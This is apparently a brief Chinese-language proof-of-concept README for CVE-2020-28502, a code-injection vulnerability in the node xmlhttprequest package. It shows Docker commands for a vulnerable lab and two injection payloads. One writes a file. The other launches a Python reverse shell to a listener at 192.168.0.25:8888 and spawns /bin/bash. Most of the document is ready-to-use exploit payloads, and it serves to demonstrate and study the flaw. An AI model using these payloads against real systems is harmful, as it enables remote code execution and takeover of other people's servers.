
CVE-2020-28502 node-XMLHttpRequest RCE
这影响包 xmlhttprequest 1.7.0 之前的所有版本;以及包 xmlhttprequest-ssl 的所有版本。当请求同步发送时(即 xhr.open 中的 async=False),恶意用户输入流入 xhr.send 可能导致任意代码被注入并执行。

$ docker build -t cve-2020-28502 .
$ docker run --rm -p 3000:3000 cve-2020-28502

提交有效载荷
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//
$ nc -l 8888
将 IP 地址 (192.168.0.25) 更改为您的本地 IP 地址
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//